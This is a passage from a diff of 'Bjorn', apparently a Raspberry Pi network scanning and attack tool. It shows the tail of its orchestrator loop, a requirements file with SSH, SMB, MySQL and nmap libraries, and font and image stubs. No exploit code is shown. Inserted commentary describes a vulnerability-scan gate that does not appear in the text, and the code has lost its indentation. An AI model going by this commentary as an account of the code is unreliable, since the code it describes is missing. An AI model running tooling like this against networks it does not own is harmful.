self.failed_scans_count += 1
if self.failed_scans_count >= 1:
for action in self.standalone_actions:
with self.semaphore:
if self.execute_standalone_action(action, current_data):
self.failed_scans_count = 0
break
idle_start_time = datetime.now()
idle_end_time = idle_start_time + timedelta(seconds=self.shared_data.scan_interval)
while datetime.now() < idle_end_time:
if self.shared_data.orchestrator_should_exit:
break
remaining_time = (idle_end_time - datetime.now()).seconds
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
sys.stdout.write('\x1b[1A\x1b[2K')
logger.warning(f"Scanner did not find any new targets. Next scan in: {remaining_time} seconds")
time.sleep(1)
self.failed_scans_count = 0
continue
else:
self.failed_scans_count = 0
action_retry_pending = True
if action_retry_pending:
self.failed_scans_count = 0
if __name__ == "__main__":
orchestrator = Orchestrator()
orchestrator.run()
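
The vulnerability-scan gate above encodes each host's last result as a status string of the form success_YYYYMMDD_HHMMSS or failed_YYYYMMDD_HHMMSS and re-parses it with datetime.strptime on every pass. A minimal standalone sketch of that pattern follows; the should_retry helper and the sample values are illustrative only, not part of Bjorn's code:

from datetime import datetime, timedelta

def should_retry(scan_status, success_delay, failed_delay, retry_success=True, now=None):
    """Return True if a scan may run again, given its last recorded status string."""
    # Hypothetical helper mirroring the orchestrator's retry-delay checks.
    now = now or datetime.now()
    if not scan_status:
        return True  # Host has never been scanned
    kind, date_part, time_part = scan_status.split('_')
    last_run = datetime.strptime(f"{date_part}_{time_part}", "%Y%m%d_%H%M%S")
    if kind == 'success':
        if not retry_success:
            return False  # Re-running successful scans is disabled
        return now >= last_run + timedelta(seconds=success_delay)
    return now >= last_run + timedelta(seconds=failed_delay)

# A scan that failed ten minutes ago, with a one-hour failed-retry delay:
status = (datetime.now() - timedelta(minutes=10)).strftime("failed_%Y%m%d_%H%M%S")
print(should_retry(status, success_delay=86400, failed_delay=3600))  # -> False

Folding the outcome and its timestamp into a single cell keeps the retry state in the same row data the orchestrator already reads and writes, at the cost of string parsing on each pass.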

15
requirements.txt Normal file
View File

@@ -0,0 +1,15 @@
RPi.GPIO==0.7.1
spidev==3.5
Pillow==9.4.0
numpy==2.1.3
rich==13.9.4
pandas==2.2.3
netifaces==0.11.0
ping3==4.0.8
get-mac==0.9.2
paramiko==3.5.0
smbprotocol==1.14.0
pysmb==1.2.10
pymysql==1.1.1
sqlalchemy==2.0.36
python-nmap==0.7.1
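
These pins can typically be installed with pip install -r requirements.txt inside a Python virtual environment. Note that RPi.GPIO and spidev assume Raspberry Pi hardware, so installation on a desktop machine may fail or require stubs.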

0
resources/__init__.py Normal file
View File

File diff suppressed because it is too large

File diff suppressed because one or more lines are too long

BIN
resources/fonts/Arial.ttf Normal file

Binary file not shown.

BIN
resources/fonts/ArialB.TTF Normal file

Binary file not shown.

BIN
resources/fonts/Cartoon.ttf Normal file

Binary file not shown.

BIN
resources/fonts/Creamy.ttf Normal file

Binary file not shown.

BIN
resources/fonts/Viking.TTF Normal file

Binary file not shown.

(Several dozen added binary image files follow here; the diff viewer shows only "Binary file not shown." stubs with dimensions and sizes, roughly 134 B to 18 KiB each, and no file names, so the individual entries are omitted.)

Some files were not shown because too many files have changed in this diff.